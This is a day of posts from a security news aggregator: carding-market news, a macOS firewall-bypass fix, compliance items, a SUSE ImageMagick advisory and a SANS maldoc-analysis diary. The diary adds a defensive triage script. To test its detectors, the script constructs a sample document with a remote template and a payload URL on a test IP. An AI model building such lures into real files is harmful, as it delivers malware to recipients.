Malware Devil

Tuesday, January 19, 2021

Network Security News Summary for Tuesday January 19th, 2021

A brief daily summary of what is important in cybersecurity. The podcast is published every weekday and designed to get you ready for the day with a brief, usually about 5 minutes long, summary of current network security-related events. The content is late breaking, educational and based on listener input as well as on input received by the SANS Internet Storm Center. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .

The post Network Security News Summary for Tuesday January 19th, 2021 appeared first on Malware Devil.



https://malwaredevil.com/2021/01/19/network-security-news-summary-for-tuesday-january-19th-2021/?utm_source=rss&utm_medium=rss&utm_campaign=network-security-news-summary-for-tuesday-january-19th-2021

Monday, January 18, 2021

DFARS: How to Expedite Compliance

The Department of Defense’s long-anticipated DFARS Interim Rule went into effect in December 2020. The Interim Rule mandates that defense contractors not only perform a self-assessment based on NIST 800-171, but also report that score to the DoD. The Interim Rule also implicitly makes the new CMMC framework—to be implemented over the next several years—the […]

The post DFARS: How to Expedite Compliance appeared first on PreVeil.

The post DFARS: How to Expedite Compliance appeared first on Security Boulevard.


The post DFARS: How to Expedite Compliance appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/dfars-how-to-expedite-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=dfars-how-to-expedite-compliance

The SolarWinds Breach: Three Security Takeaways for IT

The SolarWinds attack reinforces that IT must prioritize a Zero Trust model to protect devices, identities, and resources.

The post The SolarWinds Breach: Three Security Takeaways for IT appeared first on JumpCloud.

The post The SolarWinds Breach: Three Security Takeaways for IT appeared first on Security Boulevard.


The post The SolarWinds Breach: Three Security Takeaways for IT appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/the-solarwinds-breach-three-security-takeaways-for-it/?utm_source=rss&utm_medium=rss&utm_campaign=the-solarwinds-breach-three-security-takeaways-for-it

Hackers Leaked 22 Million Records on the Dark Web in 2020

Hackers leaked over 22 million records on the Dark Web in 2020, putting your business in danger of cyberattacks. Here’s how to mitigate it.

The post Hackers Leaked 22 Million Records on the Dark Web in 2020 appeared first on Security Boulevard.


The post Hackers Leaked 22 Million Records on the Dark Web in 2020 appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/hackers-leaked-22-million-records-on-the-dark-web-in-2020/?utm_source=rss&utm_medium=rss&utm_campaign=hackers-leaked-22-million-records-on-the-dark-web-in-2020

Joker’s Stash Carding Market to Call it Quits

Joker’s Stash, by some accounts the largest underground shop for selling stolen credit card and identity data, says it’s closing up shop effective mid-February 2021. The announcement came on the heels of a turbulent year for the major cybercrime store, and just weeks after U.S. and European authorities seized a number of its servers.

A farewell message posted by Joker’s Stash admin on Jan. 15, 2021.

The Russian and English language carding store first opened in October 2014, and quickly became a major source of “dumps” — information stolen from compromised payment cards that thieves can buy and use to create physical counterfeit copies of the cards.

But 2020 turned out to be a tough year for Joker’s Stash. As cyber intelligence firm Intel 471 notes, the curator of the store announced in October that he’d contracted COVID-19, spending a week in the hospital. Around that time, Intel 471 says many of Joker’s loyal customers started complaining that the shop’s payment card data quality was increasingly poor.

“The condition impacted the site’s forums, inventory replenishments and other operations,” Intel 471 said.

Image: Gemini Advisory

That COVID diagnosis may have affected the shop owner’s ability to maintain fresh and valid inventory on his site. Gemini Advisory, a New York City-based company that monitors underground carding shops, tracked a “severe decline” in the volume of compromised payment card accounts for sale on Joker’s Stash over the past six months.

“Joker’s Stash has received numerous user complaints alleging that card data validity is low, which even prompted the administrator to upload proof of validity through a card-testing service,” Gemini wrote in a blog post about the planned shutdown.

Image: Gemini Advisory

Then on Dec. 16, 2020, several of Joker’s long-held domains began displaying notices that the sites had been seized by the U.S. Department of Justice and Interpol. The crime shop quickly recovered, moving to new infrastructure and assuring the underground community that it would continue to operate normally.

Gemini estimates that Joker’s Stash generated more than a billion dollars in revenue over the past several years. Much of that revenue came from high-profile breaches, including tens of millions of payment card records stolen from major merchants including Saks Fifth Avenue, Lord and Taylor, Bebe Stores, Hilton Hotels, Jason’s Deli, Whole Foods, Chipotle, Wawa, Sonic Drive-In, the Hy-Vee supermarket chain, Buca Di Beppo, and Dickey’s BBQ.

Joker’s Stash routinely teased big breaches days or weeks in advance of selling payment card records stolen from those companies, and periodically linked to this site and other media outlets as proof of his shop’s prowess and authenticity.

Like many other top cybercrime bazaars, Joker’s Stash was a frequent target of phishers looking to rip off unwary or unsophisticated thieves. In 2018, KrebsOnSecurity detailed a vast network of fake Joker’s Stash sites set up to steal login credentials and bitcoin. The phony sites all traced back to the owners of a Pakistani web site design firm. Many of those fake sites are still active (e.g. jokersstash[.]su).

As noted here in 2016, Joker’s Stash attracted an impressive number of customers who kept five and six-digit balances at the shop, and who were granted early access to new breaches as well as steep discounts for bulk buys. Those “partner” customers will be given the opportunity to cash out their accounts. But the majority of Stash customers do not enjoy this status, and will have to spend their balances by Feb. 15 or forfeit those funds.

The dashboard for a Joker’s Stash customer who’s spent over $10,000 buying stolen credit cards from the site.

Gemini said another event that may have contributed to this threat actor shutting down their marketplace is the recent spike in the value of Bitcoin. A year ago, one bitcoin was worth about $9,000. Today a single bitcoin is valued at more than $35,000.

“JokerStash was an early advocate of Bitcoin and claims to keep all proceeds in this cryptocurrency,” Gemini observed in a blog post. “This actor was already likely to be among the wealthiest cybercriminals, and the spike may have multiplied their fortune, earning them enough money to retire. However, the true reason behind this shutdown remains unclear.”

If the bitcoin price theory holds, that would be fairly rich considering the parting lines in the closure notice posted to Joker’s Stash.

“We are also want to wish all young and mature ones cyber-gangsters not to lose themselves in the pursuit of easy money,” the site administrator(s) advised. “Remember, that even all the money in the world will never make you happy and that all the most truly valuable things in this life are free.”

Regardless, the impending shutdown is unlikely to have much of an impact on the overall underground carding industry, Gemini notes.

“Given Joker’s Stash’s high profile, it relied on a robust network of criminal vendors who offered their stolen records on this marketplace, among others,” the company wrote. “Gemini assesses with a high level of confidence that these vendors are very likely to fully transition to other large, top-tier dark web marketplaces.”


The post Joker’s Stash Carding Market to Call it Quits appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/jokers-stash-carding-market-to-call-it-quits/?utm_source=rss&utm_medium=rss&utm_campaign=jokers-stash-carding-market-to-call-it-quits

Capitol Rioters ID’ed With Help From Dating Apps


Dating apps and grassroots users are passing evidence of rioters’ identities to law enforcement. But privacy wonks are worried.

The post Capitol Rioters ID’ed With Help From Dating Apps appeared first on Security Boulevard.


The post Capitol Rioters ID’ed With Help From Dating Apps appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/capitol-rioters-ided-with-help-from-dating-apps/?utm_source=rss&utm_medium=rss&utm_campaign=capitol-rioters-ided-with-help-from-dating-apps

The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations)

Living through a global pandemic has made life tough for every human on the planet—some far more than …

The post The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations) appeared first on Hyperproof.

The post The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations) appeared first on Security Boulevard.


The post The Growing Importance of Security Assurance (And What It Means to Be Good at Compliance Operations) appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/the-growing-importance-of-security-assurance-and-what-it-means-to-be-good-at-compliance-operations/?utm_source=rss&utm_medium=rss&utm_campaign=the-growing-importance-of-security-assurance-and-what-it-means-to-be-good-at-compliance-operations

WhatsApp Data Privacy | Avast

Earlier this month, WhatsApp gave its users an ultimatum: accept new data sharing terms or delete their accounts. For some of its billion global users, this was not received well, especially since some of your data would be shared across all of Facebook’s other operations.

The post WhatsApp Data Privacy | Avast appeared first on Security Boulevard.


The post WhatsApp Data Privacy | Avast appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/whatsapp-data-privacy-avast/?utm_source=rss&utm_medium=rss&utm_campaign=whatsapp-data-privacy-avast

Dr. Martin Luther King, Jr. Day 2021

The post Dr. Martin Luther King, Jr. Day 2021 appeared first on Security Boulevard.


The post Dr. Martin Luther King, Jr. Day 2021 appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/dr-martin-luther-king-jr-day-2021/?utm_source=rss&utm_medium=rss&utm_campaign=dr-martin-luther-king-jr-day-2021

Details on the New NIST Requirement for RASP and IAST

If you’re looking for more information on the latest update to the NIST (National Institute of Standards and Technology) security and privacy controls catalog, SP 800-53, there’s a new article just published in the Cutter Business Technology Journal detailing the changes, the timing, and an explanation of the new technologies (RASP and IAST) added to the framework.

The post Details on the New NIST Requirement for RASP and IAST appeared first on K2io.

The post Details on the New NIST Requirement for RASP and IAST appeared first on Security Boulevard.


The post Details on the New NIST Requirement for RASP and IAST appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/details-on-the-new-nist-requirement-for-rasp-and-iast/?utm_source=rss&utm_medium=rss&utm_campaign=details-on-the-new-nist-requirement-for-rasp-and-iast

Apple Removes macOS Feature That Allowed Apps to Bypass Firewall Security


Apple has removed a controversial feature from its macOS operating system that allowed the company’s own first-party apps to bypass content filters, VPNs, and third-party firewalls.

Called “ContentFilterExclusionList,” it named as many as 50 Apple apps and services, including iCloud, Maps, Music, FaceTime, HomeKit, the App Store, and the software update service, that were exempted from the Network Extension framework’s content filters, effectively circumventing firewall protections.

This exclusion list has been scrubbed now from macOS 11.2 beta 2.

The issue first came to light last October following the release of macOS Big Sur, prompting concerns from security researchers who said the feature was ripe for abuse, adding it could be leveraged by an attacker to exfiltrate sensitive data by piggybacking it on to legitimate Apple apps included on the list and then bypass firewalls and security software.

“After lots of bad press and lots of feedback/bug reports to Apple from developers such as myself, it seems wiser (more security conscious) minds at Cupertino prevailed,” said Patrick Wardle, a principal security researcher with Jamf, last week.


Researchers, including Wardle, found last year that Apple’s apps were being excluded from NEFilterDataProvider, a network content filter that makes it possible for firewall and VPN apps such as LuLu and Little Snitch to monitor and control data traffic from installed apps on the system.

Wardle demonstrated an instance of how malicious apps could exploit this firewall bypass to transmit data to an attacker-controlled server using a simple Python script that latched the traffic onto an Apple exempted app despite setting LuLu and Little Snitch to block all outgoing connections on a Mac running Big Sur.

With this new change, socket filter firewalls such as LuLu can now comprehensively filter/block all network traffic, including those from Apple apps.

The updates come as Apple deprecated support for Network Kernel Extensions in 2019 in favor of Network Extensions Framework.

We have reached out to Apple, and we’ll update the story if we hear back.



The post Apple Removes macOS Feature That Allowed Apps to Bypass Firewall Security appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/apple-removes-macos-feature-that-allowed-apps-to-bypass-firewall-security-2/?utm_source=rss&utm_medium=rss&utm_campaign=apple-removes-macos-feature-that-allowed-apps-to-bypass-firewall-security-2

Managing Identities and Entitlements to Secure the Public Cloud 


Accelerated digital transformation in response to the pandemic has blurred the line between the public cloud and the internal network, creating a much more complex environment that organizations still struggle to secure. One particularly troublesome area is managing identities and entitlements. The COVID-19 pandemic forced many businesses to transition to a remote and distributed workforce,..

The post Managing Identities and Entitlements to Secure the Public Cloud  appeared first on Security Boulevard.


The post Managing Identities and Entitlements to Secure the Public Cloud  appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/managing-identities-and-entitlements-to-secure-the-public-cloud/?utm_source=rss&utm_medium=rss&utm_campaign=managing-identities-and-entitlements-to-secure-the-public-cloud

Hackers Calling Fair Game on Healthcare Institutions


The year 2019 saw big consumer brands get hacked: from Facebook to Capital One, everyday people were urged to double-check their bank accounts and credit card statements to ensure their information had not been stolen. The prime target: all of your personal data. The year 2020 was a completely different animal, and the new..

The post Hackers Calling Fair Game on Healthcare Institutions appeared first on Security Boulevard.


The post Hackers Calling Fair Game on Healthcare Institutions appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/hackers-calling-fair-game-on-healthcare-institutions/?utm_source=rss&utm_medium=rss&utm_campaign=hackers-calling-fair-game-on-healthcare-institutions

Doc & RTF Malicious Document, (Mon, Jan 18th)

A reader pointed us to a malicious Word document.

First, I run my strings.py command on it, with option -a to get statistics (see my diary entry “Strings 2021“).

There aren’t any long strings in this file (the longest is 33 characters). So there isn’t a payload here that we can extract directly, like we did in diary entry “Maldoc Strings Analysis“.

Let’s check if there are URLs in this file, by grepping for http:

Unfortunately, none.

Let’s take a look at the longest strings (-n 20: strings at least 20 characters long):

If you are a bit familiar with the internals of Word documents, you might recognize this as the name of XML files found inside OOXML files (.docx, .docm, .xlsx, …).

Let’s try oledump.py:

This means that there are no OLE files inside this OOXML file, hence no VBA macros.

Since an OOXML file is an OPC package, i.e. a ZIP container, let’s take a look with my tool zipdump.py:

It looks like this OOXML file only contains XML files (extensions .xml and .rels). Let’s verify by getting statistics of the content of the contained files, by using option -e:

Here is a closer look at the statistics:

All contained files start with <?xm and contain only printable ASCII characters (except one file with 90 bytes >= 127).

So we have no binary files in here, just text files. One possible scenario is that this .docx file contains a reference (URL) to a malicious payload.

The next step is to extract all files and search for URLs in them. Office OOXML files contain a lot of legitimate URLs, so to get an idea of what type of URLs we have in this document, we use my re-search.py tool to extract URLs and display a unique list of the hostnames found in these URLs, like this:

The following hostnames are legitimate, and found in Office OOXML files:

schemas.openxmlformats.org
schemas.microsoft.com
purl.org
www.w3.org

But the IP address is not. So let’s extract the full URLs now, and grep for 104:

I downloaded this document. Let’s start again with strings:

4555 characters long: this might be a payload. Let’s take a look:

This looks like a lot of hexadecimal data. That’s interesting. And notice the 3 curly braces at the end. Hexadecimal data and curly braces: this might be a malicious RTF document. Let’s check with the file command (I use my tool file-magic.py on Windows):

This is indeed an RTF file. RTF files cannot contain VBA code. If they are malicious, they often contain an exploit, stored as (obfuscated) hexadecimal characters inside the RTF file. Hence the strings command will not be of much use.

I recently updated my tool rtfdump.py to make analysis of embedded objects (like malicious payloads) easier. We use the new option -O to get an overview of all objects found inside this RTF file:

There’s one object with name equation… . It’s very likely that this is an exploit for the equation editor, and that we have to extract and analyze shellcode.

Let’s extract this payload and write it to a file:

Let’s see if there are some interesting strings:

Nothing interesting.

The equation editor that is targeted here only exists as a 32-bit executable. Hence the shellcode must also be 32-bit, and we can use the shellcode emulator scdbg to help us.

We use option -findsc to let scdbg search for entry points, option -r to produce a report, and -f shellcode to pass the shellcode file for analysis:

The shellcode emulator found 4 entry points (numbered 0 to 3). I select entry point 0. This results in the emulation of shellcode, that calls the Win32 API (GetProcAddress, …). This is clearly 32-bit Windows shellcode. And it decodes itself into memory. We can use option -d to dump the decoded shellcode:

This creates a file: shellcode.unpack. Let’s use strings again on this file:

This looks more promising. What are the longest strings:

And finally, we have our URL.
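The diary walks through the steps but the tool output itself is not reproduced here. The following script, an added example that is not part of the diary and not one of Didier Stevens’ tools, mimics the logic of the zipdump -e, re-search (URL/hostname) and rtfdump -O steps with only the Python standard library: it inventories the members of an OOXML container, flags OLE content and high bytes, extracts URLs and separates them from the well-known schema hosts, then decodes the hex \objdata of an RTF object and runs a strings pass over it. Every input is constructed for the demo: the docx, the RTF and the payload are synthetic, 192.0.2.10 is an RFC 5737 test address rather than the IP from the diary, and the plaintext URL in the object data stands in for what, in a real sample, only appears after the shellcode is emulated.

```python
"""Offline triage helpers for OOXML (.docx) and RTF maldocs.

Added example, not Didier Stevens' tools. All sample data is constructed;
192.0.2.10 is an RFC 5737 test address and the RTF payload is a stand-in.
"""
import io
import re
import zipfile

# Hosts that legitimately occur in OOXML namespace and schema references.
OOXML_ALLOWLIST = {"schemas.openxmlformats.org", "schemas.microsoft.com",
                   "purl.org", "www.w3.org"}
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 / Compound File header


def inventory(zip_bytes):
    """zipdump -e style statistics for every member of an OOXML container."""
    rows = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            rows.append({"name": info.filename, "size": len(data),
                         "xml_header": data.startswith(b"<?xm"),
                         "high_bytes": sum(b >= 0x80 for b in data),
                         "ole": data.startswith(OLE_MAGIC)})
    return rows


def extract_urls(zip_bytes):
    """Every http(s) URL in every member (latin-1 so no byte is lost)."""
    urls = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            urls.update(u.decode("latin-1") for u in URL_RE.findall(zf.read(name)))
    return urls


def suspicious_urls(urls, allowlist=OOXML_ALLOWLIST):
    """URLs whose host (scheme and port stripped) is not a known schema host."""
    def host(url):
        return re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()
    return sorted(u for u in urls if host(u) not in allowlist)


def rtf_objects(rtf_bytes):
    """rtfdump -O style overview: [(objclass, decoded objdata bytes), ...].
    Obfuscation is handled crudely: every non-hex byte in the data run is dropped."""
    objs = []
    for m in re.finditer(rb"\\object\b(.*?)\\objdata\b([^}]*)\}", rtf_bytes, re.S):
        cls = re.search(rb"\\objclass\s+([^}\\]+)", m.group(1))
        hexdata = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(2))
        hexdata = hexdata[: len(hexdata) & ~1]        # drop a dangling nibble
        objs.append((cls.group(1).strip().decode() if cls else "",
                     bytes.fromhex(hexdata.decode())))
    return objs


def long_strings(data, minimum=20):
    """strings -n <minimum>: printable ASCII runs of at least `minimum` bytes."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % minimum, data)]


def build_sample_docx():
    """Constructed .docx: XML parts only, one external relationship to an IP."""
    ct = (b'<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.'
          b'openxmlformats.org/package/2006/content-types"/>')
    doc = (b'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://'
           b'schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>'
           b'<w:r><w:t>Enable content to view</w:t></w:r></w:p></w:body></w:document>')
    rels = (b'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://'
            b'schemas.openxmlformats.org/package/2006/relationships"><Relationship '
            b'Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
            b'relationships/attachedTemplate" Target="http://192.0.2.10/template.dotm" '
            b'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", ct)
        zf.writestr("word/document.xml", doc)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed RTF with one embedded "Equation.3" object. The object data is a
# stand-in (header, NOP-like filler, plaintext URL), hex-encoded with line
# breaks inserted the way obfuscated samples often do.
_payload = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"\x90" * 8
            + b"http://192.0.2.10/payload.exe\x00")
_hex = _payload.hex().encode()
SAMPLE_RTF = (b"{\\rtf1\\ansi\n{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata\n"
              + b"\r\n".join(_hex[i:i + 32] for i in range(0, len(_hex), 32))
              + b"\r\n}}}")

if __name__ == "__main__":
    sample = build_sample_docx()
    for row in inventory(sample):
        print(row)
    print("suspicious URLs:", suspicious_urls(extract_urls(sample)))
    for objclass, data in rtf_objects(SAMPLE_RTF):
        print(objclass, len(data), "bytes ->", long_strings(data))
```

The allowlist is deliberately short: anything outside it is worth a look, which is exactly how the IP address stood out in the diary. The RTF parser stops at the first closing brace after \objdata, which is enough for this constructed sample but will need the real rtfdump.py for samples that nest groups or control words inside the hex run, and a decoded object that is an Equation Editor exploit still has to go through scdbg before its strings mean anything.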
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post Doc & RTF Malicious Document, (Mon, Jan 18th) appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/doc-rtf-malicious-document-mon-jan-18th/?utm_source=rss&utm_medium=rss&utm_campaign=doc-rtf-malicious-document-mon-jan-18th

The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned

This week co-host Kevin Johnson joins me to discuss the cybersecurity lessons learned from the US Capitol riot, why deplatforming is not violating First Amendment rights, and much more. ** Links mentioned on the show ** Check out our series on how to break into a cybersecurity career https://sharedsecurity.net/2021/01/04/how-to-break-into-to-a-cybersecurity-career-part-1/ https://sharedsecurity.net/2021/01/11/how-to-break-into-a-cybersecurity-career-part-2-with-rafal-los/ What the First Amendment actually […]

The post The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned appeared first on The Shared Security Show.

The post The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned appeared first on Security Boulevard.


The post The Capital Riot: First Amendment and Deplatforming, Cybersecurity Lessons Learned appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/the-capital-riot-first-amendment-and-deplatforming-cybersecurity-lessons-learned/?utm_source=rss&utm_medium=rss&utm_campaign=the-capital-riot-first-amendment-and-deplatforming-cybersecurity-lessons-learned

The Changing Dynamics of Cyber Insurance

Almost exactly a year ago, cybersecurity professionals were locked in a heated debate about insurance. While some were keen to point out that the future of the industry would need to include some form of insurance market, others argued that cyber insurance would never be worth the premiums, especially given the inherently volatile nature of […]

The post The Changing Dynamics of Cyber Insurance appeared first on The State of Security.

The post The Changing Dynamics of Cyber Insurance appeared first on Security Boulevard.


The post The Changing Dynamics of Cyber Insurance appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/the-changing-dynamics-of-cyber-insurance/?utm_source=rss&utm_medium=rss&utm_campaign=the-changing-dynamics-of-cyber-insurance

ISC Stormcast For Monday, January 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7332, (Mon, Jan 18th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post ISC Stormcast For Monday, January 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7332, (Mon, Jan 18th) appeared first on Malware Devil.



https://malwaredevil.com/2021/01/18/isc-stormcast-for-monday-january-18th-2021-https-isc-sans-edu-podcastdetail-htmlid7332-mon-jan-18th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-january-18th-2021-https-isc-sans-edu-podcastdetail-htmlid7332-mon-jan-18th

ESB-2021.0205 – [SUSE] ImageMagick: Multiple vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2021.0205
                      Security update for ImageMagick
                              18 January 2021

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           ImageMagick
Publisher:         SUSE
Operating System:  SUSE
Impact/Access:     Execute Arbitrary Code/Commands -- Existing Account
                   Denial of Service               -- Existing Account
                   Reduced Security                -- Existing Account
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-29599 CVE-2020-27776 CVE-2020-27775
                   CVE-2020-27774 CVE-2020-27773 CVE-2020-27772
                   CVE-2020-27771 CVE-2020-27770 CVE-2020-27769
                   CVE-2020-27768 CVE-2020-27767 CVE-2020-27766
                   CVE-2020-27765 CVE-2020-27764 CVE-2020-27763
                   CVE-2020-27762 CVE-2020-27761 CVE-2020-27760
                   CVE-2020-27759 CVE-2020-27758 CVE-2020-27757
                   CVE-2020-27756 CVE-2020-27755 CVE-2020-27754
                   CVE-2020-27753 CVE-2020-27752 CVE-2020-27751
                   CVE-2020-27750 CVE-2020-25676 CVE-2020-25675
                   CVE-2020-25674 CVE-2020-25666 CVE-2020-25665
                   CVE-2020-25664 CVE-2020-19667 

Reference:         ESB-2021.0165
                   ESB-2021.0110
                   ESB-2021.0038

Original Bulletin: 
   https://www.suse.com/support/update/announcement/2021/suse-su-202114598-1
   https://www.suse.com/support/update/announcement/2021/suse-su-20210153-1

Comment: This bulletin contains two (2) SUSE security advisories.

- --------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for ImageMagick

______________________________________________________________________________

Announcement ID:   SUSE-SU-2021:14598-1
Rating:            moderate
References:        #1179103 #1179202 #1179212 #1179269 #1179281 #1179311
                   #1179312 #1179313 #1179315 #1179321 #1179322 #1179327
                   #1179336 #1179338 #1179339 #1179345 #1179346 #1179347
                   #1179397
Cross-References:  CVE-2020-19667 CVE-2020-25664 CVE-2020-25666 CVE-2020-27751
                   CVE-2020-27752 CVE-2020-27753 CVE-2020-27754 CVE-2020-27755
                   CVE-2020-27759 CVE-2020-27760 CVE-2020-27761 CVE-2020-27763
                   CVE-2020-27765 CVE-2020-27767 CVE-2020-27768 CVE-2020-27769
                   CVE-2020-27771 CVE-2020-27772 CVE-2020-27775
Affected Products:
                   SUSE Linux Enterprise Server 11-SP4-LTSS
                   SUSE Linux Enterprise Point of Sale 11-SP3
                   SUSE Linux Enterprise Debuginfo 11-SP4
                   SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

An update that fixes 19 vulnerabilities is now available.

Description:

This update for ImageMagick fixes the following issues:

  o CVE-2020-19667: Fixed a stack buffer overflow in XPM coder could result in
    a crash (bsc#1179103).
  o CVE-2020-25664: Fixed a heap-based buffer overflow in PopShortPixel (bsc#
    1179202).
  o CVE-2020-25666: Fixed an outside the range of representable values of type
    'int' and signed integer overflow (bsc#1179212).
  o CVE-2020-27751: Fixed an integer overflow in MagickCore/quantum-export.c
    (bsc#1179269).
  o CVE-2020-27752: Fixed a heap-based buffer overflow in PopShortPixel in
    MagickCore/quantum-private.h (bsc#1179346).
  o CVE-2020-27753: Fixed memory leaks in AcquireMagickMemory function (bsc#
    1179397).
  o CVE-2020-27754: Fixed an outside the range of representable values of type
    'long' and signed integer overflow at MagickCore/quantize.c (bsc#1179336).
  o CVE-2020-27755: Fixed memory leaks in ResizeMagickMemory function in
    ImageMagick/MagickCore/memory.c (bsc#1179345).
  o CVE-2020-27757: Fixed an outside the range of representable values of type
    'unsigned long long' at MagickCore/quantum-private.h (bsc#1179268).
  o CVE-2020-27759: Fixed an outside the range of representable values of type
    'int' at MagickCore/quantize.c (bsc#1179313).
  o CVE-2020-27760: Fixed a division by zero at MagickCore/enhance.c (bsc#
    1179281).
  o CVE-2020-27761: Fixed an outside the range of representable values of type
    'unsigned long' at coders/palm.c (bsc#1179315).
  o CVE-2020-27763: Fixed a division by zero at MagickCore/resize.c (bsc#
    1179312).
  o CVE-2020-27765: Fixed a division by zero at MagickCore/segment.c (bsc#
    1179311).
  o CVE-2020-27767: Fixed an outside the range of representable values of type
    'float' at MagickCore/quantum.h (bsc#1179322).
  o CVE-2020-27768: Fixed an outside the range of representable values of type
    'unsigned int' at MagickCore/quantum-private.h (bsc#1179339).
  o CVE-2020-27769: Fixed an outside the range of representable values of type
    'float' at MagickCore/quantize.c (bsc#1179321).
  o CVE-2020-27771: Fixed an outside the range of representable values of type
    'unsigned char' at coders/pdf.c (bsc#1179327).
  o CVE-2020-27772: Fixed an outside the range of representable values of type
    'unsigned int' at coders/bmp.c (bsc#1179347).
  o CVE-2020-27775: Fixed an outside the range of representable values of type
    'unsigned char' at MagickCore/quantum.h (bsc#1179338).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

  o SUSE Linux Enterprise Server 11-SP4-LTSS:
    zypper in -t patch slessp4-ImageMagick-14598=1
  o SUSE Linux Enterprise Point of Sale 11-SP3:
    zypper in -t patch sleposp3-ImageMagick-14598=1
  o SUSE Linux Enterprise Debuginfo 11-SP4:
    zypper in -t patch dbgsp4-ImageMagick-14598=1
  o SUSE Linux Enterprise Debuginfo 11-SP3:
    zypper in -t patch dbgsp3-ImageMagick-14598=1

Package List:

  o SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):
       libMagickCore1-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Server 11-SP4-LTSS (ppc64 s390x x86_64):
       libMagickCore1-32bit-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Point of Sale 11-SP3 (i586):
       libMagickCore1-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):
       ImageMagick-debuginfo-6.4.3.6-78.135.1
       ImageMagick-debugsource-6.4.3.6-78.135.1
  o SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):
       ImageMagick-debuginfo-6.4.3.6-78.135.1
       ImageMagick-debugsource-6.4.3.6-78.135.1


References:

  o https://www.suse.com/security/cve/CVE-2020-19667.html
  o https://www.suse.com/security/cve/CVE-2020-25664.html
  o https://www.suse.com/security/cve/CVE-2020-25666.html
  o https://www.suse.com/security/cve/CVE-2020-27751.html
  o https://www.suse.com/security/cve/CVE-2020-27752.html
  o https://www.suse.com/security/cve/CVE-2020-27753.html
  o https://www.suse.com/security/cve/CVE-2020-27754.html
  o https://www.suse.com/security/cve/CVE-2020-27755.html
  o https://www.suse.com/security/cve/CVE-2020-27759.html
  o https://www.suse.com/security/cve/CVE-2020-27760.html
  o https://www.suse.com/security/cve/CVE-2020-27761.html
  o https://www.suse.com/security/cve/CVE-2020-27763.html
  o https://www.suse.com/security/cve/CVE-2020-27765.html
  o https://www.suse.com/security/cve/CVE-2020-27767.html
  o https://www.suse.com/security/cve/CVE-2020-27768.html
  o https://www.suse.com/security/cve/CVE-2020-27769.html
  o https://www.suse.com/security/cve/CVE-2020-27771.html
  o https://www.suse.com/security/cve/CVE-2020-27772.html
  o https://www.suse.com/security/cve/CVE-2020-27775.html
  o https://bugzilla.suse.com/1179103
  o https://bugzilla.suse.com/1179202
  o https://bugzilla.suse.com/1179212
  o https://bugzilla.suse.com/1179269
  o https://bugzilla.suse.com/1179281
  o https://bugzilla.suse.com/1179311
  o https://bugzilla.suse.com/1179312
  o https://bugzilla.suse.com/1179313
  o https://bugzilla.suse.com/1179315
  o https://bugzilla.suse.com/1179321
  o https://bugzilla.suse.com/1179322
  o https://bugzilla.suse.com/1179327
  o https://bugzilla.suse.com/1179336
  o https://bugzilla.suse.com/1179338
